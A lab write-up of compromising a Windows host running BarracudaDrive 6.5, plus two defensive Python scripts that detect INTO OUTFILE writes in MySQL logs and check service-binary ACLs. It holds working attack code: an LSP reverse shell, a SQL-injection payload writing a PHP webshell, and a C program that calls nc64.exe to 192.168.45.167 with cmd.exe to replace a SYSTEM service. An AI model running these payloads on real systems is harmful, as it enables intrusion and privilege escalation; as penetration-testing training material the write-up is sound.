1st Way - Directly SYSTEM

Nmap

The initial nmap scan revealed that SMB, MySQL and HTTP on port 8000 were open.

[Screenshot: nmap scan]

Web Enumeration

Visiting the website revealed that BarracudaDrive 6.5 was in use.

[Screenshot: web page showing the BarracudaDrive 6.5 version]

Exploitation

The site was similar to FuguHub, so the first step was to create an admin user.

[Screenshot: setting the admin user]

Then, from the Customize page, I replaced the About page with an LSP reverse shell:

<?lsp if request:method() == "GET" then ?>
    <?lsp 
        local host, port = "<IP>", <PORT>
        local socket = require("socket")
        local tcp = socket.tcp()
        local io = require("io")
        local connection, err = tcp:connect(host, port)
        
        if not connection then
            print("Error connecting: " .. err)
            return
        end
        
        while true do
            local cmd, status, partial = tcp:receive()
            if status == "closed" or status == "timeout" then break end
            if cmd then
                local f = io.popen(cmd, "r")
                local s = f:read("*a")
                f:close()
                tcp:send(s)
            end
        end
        
        tcp:close()
    ?>
<?lsp else ?>
    Wrong request method, goodBye! 
<?lsp end ?>

[Screenshot: customize page with the modified About page]

Visiting the About page got me a SYSTEM shell: the BarracudaDrive service runs as SYSTEM, so the LSP code executes with those privileges.

[Screenshot: reverse shell]

[Screenshot: proof]

2nd Way - Intended Way

Enumeration

Nmap also revealed that two additional web ports, 45332 and 33033, were open.

[Screenshots: nmap results for the additional web ports]

The website on port 45332 was a simple site with no input points.

[Screenshot: quiz website]

Directory brute force revealed a phpinfo.php file.

[Screenshot: directory brute force finding phpinfo.php]

I noted down the DOCUMENT_ROOT variable, which gives the on-disk path of the web root.

[Screenshot: DOCUMENT_ROOT in phpinfo]

The other website, on port 33033, redirected to a user page. One of the users had a different description from the rest.

[Screenshot: the user with the unusual description]

I could not log in, but there was a forgot-password button. It required a reminder answer; I tried paranoid for that user and it worked, so I logged in.

[Screenshot: password reset with the reminder]

[Screenshot: logged in]

There was an experimental feature called request profile slug.

[Screenshot: profile slug feature]

So I tested for SQL injection there and it worked.

[Screenshot: SQL injection test]

[Screenshot: SQL injection confirmed]

Exploitation

So I used an INTO OUTFILE query to write a webshell into DOCUMENT_ROOT (this only works when the database user holds the FILE privilege and secure_file_priv does not restrict the target directory).

' UNION SELECT ("<?php echo passthru($_GET['cmd']);") INTO OUTFILE 'C:/xampp/htdocs/cmd.php'  -- -'

[Screenshot: file written into the web root]

And I was able to execute commands.

[Screenshot: command execution through the webshell]

I transferred nc64.exe and executed it.

[Screenshot: nc64.exe]

Then I simply got a reverse shell.

[Screenshot: local user shell]
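The INTO OUTFILE write above is the kind of query a database administrator can catch in the MySQL general query log, and it is what the secure_file_priv setting exists to prevent. The following Python is an added example, not part of the original write-up: it parses log lines in the general-log layout, flags every INTO OUTFILE / INTO DUMPFILE write, rates it by whether the target sits under a web root and whether the payload carries script markers, and reports whether a given secure_file_priv value would have refused the write. The log lines, the web-root list and all function names are constructed for this example.

```python
import re
from dataclasses import dataclass
from typing import List, Optional

# Constructed sample in the layout of the MySQL general query log
# (timestamp, connection id, command, argument); not a real capture.
SAMPLE_LOG = """\
2024-05-01T10:12:03.000001Z\t   12 Connect\twebapp@localhost on quiz
2024-05-01T10:12:04.000002Z\t   12 Query\tSELECT name, bio FROM users WHERE slug = 'sugoi'
2024-05-01T10:12:09.000003Z\t   12 Query\tSELECT name, bio FROM users WHERE slug = '' UNION SELECT ("<?php echo passthru($_GET['cmd']);") INTO OUTFILE 'C:/xampp/htdocs/cmd.php'  -- -'
2024-05-01T10:12:15.000004Z\t   13 Query\tSELECT id, score INTO OUTFILE '/var/lib/mysql-files/scores.csv' FROM results
2024-05-01T10:12:20.000005Z\t   12 Quit\t
"""

LINE_RE = re.compile(r"^(?P<ts>\S+)\s+(?P<conn>\d+)\s+(?P<cmd>\w+)\t(?P<arg>.*)$")
# File-writing clauses: INTO OUTFILE writes rows, INTO DUMPFILE writes raw bytes.
FILE_WRITE_RE = re.compile(r"\bINTO\s+(OUTFILE|DUMPFILE)\s+'([^']*)'", re.IGNORECASE)
# Markers that turn a written file into server-side code when it lands under a web root.
SCRIPT_RE = re.compile(r"<\?php|<\?=|<%|<script", re.IGNORECASE)


def _norm(path: str) -> str:
    return path.replace("\\", "/").rstrip("/").lower()


def is_under(path: str, root: str) -> bool:
    """True if path lies inside root (case-insensitive, slash-agnostic)."""
    p, r = _norm(path), _norm(root)
    return p == r or p.startswith(r + "/")


@dataclass
class Finding:
    conn: str
    kind: str          # OUTFILE or DUMPFILE
    target: str        # file the query tried to write
    in_web_root: bool
    script_payload: bool
    severity: str


def analyze_log(text: str, web_roots: List[str]) -> List[Finding]:
    """Flag every query that writes a file, rating it by where and what it writes."""
    findings = []
    for line in text.splitlines():
        m = LINE_RE.match(line)
        if not m or m.group("cmd") != "Query":
            continue
        query = m.group("arg")
        fw = FILE_WRITE_RE.search(query)
        if not fw:
            continue
        target = fw.group(2)
        in_root = any(is_under(target, root) for root in web_roots)
        script = bool(SCRIPT_RE.search(query))
        if in_root and script:
            severity = "critical"   # server-side code dropped into a web root
        elif in_root or script:
            severity = "high"
        else:
            severity = "medium"     # legitimate exports still deserve a look
        findings.append(Finding(m.group("conn"), fw.group(1).upper(), target, in_root, script, severity))
    return findings


def secure_file_priv_blocks(setting: Optional[str], target: str) -> bool:
    """Would this secure_file_priv value have refused the write?

    None -> file import/export disabled entirely (refuses everything)
    ""   -> no restriction (refuses nothing)
    dir  -> only paths inside that directory are allowed
    """
    if setting is None:
        return True
    if setting == "":
        return False
    return not is_under(target, setting)


if __name__ == "__main__":
    for f in analyze_log(SAMPLE_LOG, ["C:/xampp/htdocs"]):
        print(f"[{f.severity}] conn {f.conn}: INTO {f.kind} -> {f.target}")
        print("  refused with secure_file_priv=NULL:", secure_file_priv_blocks(None, f.target))
```

Run against the constructed lines, the injected query comes back as critical (web root plus a PHP marker) while the CSV export on connection 13 is only medium. The secure_file_priv check shows the fix: pointing the setting at a dedicated export directory refuses the write into htdocs while still allowing the export; setting it to NULL refuses both. Revoking the FILE privilege from the web application's database account closes the same door independently of that setting.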

Privilege Escalation

As we know, BarracudaDrive 6.5 was in use, and this version is vulnerable to insecure folder permissions. I found an exploit description online (https://www.exploit-db.com/exploits/48789).

All I had to do was replace C:\bd\bd.exe with a malicious file and run shutdown /r /t 0 to reboot, so that the service would start the replaced binary.

So first I created a malicious C file and compiled it with i686-w64-mingw32-gcc.

#include <stdlib.h>

int main(void){
    system("C:\\xampp\\htdocs\\nc64.exe 192.168.45.167 445 -e cmd.exe");
    return 0;
}

i686-w64-mingw32-gcc exp.c -l ws2_32 -o bd.exe

[Screenshot: exp.c]

Then I renamed the original bd.exe to bd.exe.bat and transferred the malicious file in its place.

[Screenshot: replaced bd.exe]

Then I set up a nc reverse shell listener and rebooted the machine.

[Screenshot: reboot]

After some time, I got a SYSTEM shell.

[Screenshot: SYSTEM shell]
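The escalation in this section works only because the folder holding the service binary lets ordinary users rename and replace files in it. The following Python is an added example, not code from the original post or from BarracudaDrive: it parses output in the layout of the Windows icacls command and reports every allow entry that grants a low-privileged group a write-capable right. The icacls output is constructed for the example (the ACL shown for C:\bd\bd.exe is an assumption, and the other two paths are assumptions too); on a real host you would feed it the icacls output for each service's binary and its parent folder.

```python
import re
from dataclasses import dataclass
from typing import Dict, List, Tuple

# Constructed sample in the layout of `icacls <path>` output; not a real capture.
# Each entry is the path followed by one ACE per line (continuation lines are
# indented), entries are separated by a blank line, and a summary line closes it.
ICACLS_SAMPLE = """\
C:\\bd\\bd.exe BUILTIN\\Users:(I)(F)
              NT AUTHORITY\\SYSTEM:(I)(F)
              BUILTIN\\Administrators:(I)(F)

C:\\Windows\\System32\\svchost.exe NT SERVICE\\TrustedInstaller:(F)
                                  NT AUTHORITY\\SYSTEM:(RX)
                                  BUILTIN\\Administrators:(RX)
                                  BUILTIN\\Users:(RX)

C:\\Program Files\\Vendor\\agent.exe BUILTIN\\Users:(DENY)(W)
                                   NT AUTHORITY\\Authenticated Users:(I)(M)
                                   NT AUTHORITY\\SYSTEM:(I)(F)

Successfully processed 3 files; Failed processing 0 files
"""

# An ACE is "<principal>:<flag groups>"; the principal is assumed to be
# DOMAIN\name or a bare name such as Everyone. Paths may contain spaces, so the
# first line is parsed lazily: the shortest path prefix that leaves a valid ACE wins.
ACE = r"(?P<principal>(?:[A-Za-z0-9 .\-]+\\)?[^\\:()]+):(?P<flags>(?:\([^)]*\))+)"
FIRST_RE = re.compile(r"^(?P<path>\S.*?)\s+" + ACE + r"\s*$")
CONT_RE = re.compile(r"^\s+" + ACE + r"\s*$")

# Rights that let a principal replace or alter the file's contents:
# F full, M modify, W write, WD write data, AD append data, WDAC change ACL,
# WO take ownership, D delete (delete plus a writable folder allows replacement).
WRITE_LIKE = {"F", "M", "W", "WD", "AD", "WDAC", "WO", "D"}
# Principals every local user belongs to (English well-known names).
LOW_PRIV = {"everyone", "builtin\\users", "builtin\\guests",
            "nt authority\\authenticated users", "nt authority\\interactive"}


@dataclass
class Ace:
    principal: str
    flags: List[str]   # inheritance markers and rights mixed, as icacls prints them


def _ace(m) -> Ace:
    return Ace(m.group("principal").strip(), re.findall(r"\(([^)]*)\)", m.group("flags")))


def parse_icacls(text: str) -> Dict[str, List[Ace]]:
    """Map each path in icacls output to its list of ACEs."""
    entries: Dict[str, List[Ace]] = {}
    current = None
    for line in text.splitlines():
        if not line.strip():
            current = None          # blank line ends the current entry
            continue
        if not line[0].isspace():
            m = FIRST_RE.match(line)
            if m:
                current = m.group("path")
                entries.setdefault(current, []).append(_ace(m))
            continue                # the summary line and anything unparsed is skipped
        m = CONT_RE.match(line)
        if m and current is not None:
            entries[current].append(_ace(m))
    return entries


def writable_by_low_priv(entries: Dict[str, List[Ace]]) -> List[Tuple[str, str, List[str]]]:
    """(path, principal, rights) for every allow ACE giving a low-privileged group write-like rights."""
    findings = []
    for path, aces in entries.items():
        for ace in aces:
            if "DENY" in ace.flags:
                continue            # deny entries never grant anything
            rights = sorted(WRITE_LIKE & set(ace.flags))
            if rights and ace.principal.lower() in LOW_PRIV:
                findings.append((path, ace.principal, rights))
    return findings


if __name__ == "__main__":
    for path, who, rights in writable_by_low_priv(parse_icacls(ICACLS_SAMPLE)):
        print(f"{path}: {who} has {','.join(rights)}")
```

On the constructed sample the check reports bd.exe (BUILTIN\Users with full control) and the vendor agent (Authenticated Users with modify), and stays quiet about svchost.exe, where Users only hold read and execute. Because the write-up replaces the binary by renaming it inside C:\bd, the parent folder's ACL matters as much as the file's own, so run the check on both. The fix is the usual one: the folder and binary of a service that runs as SYSTEM should be writable by Administrators and SYSTEM only.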
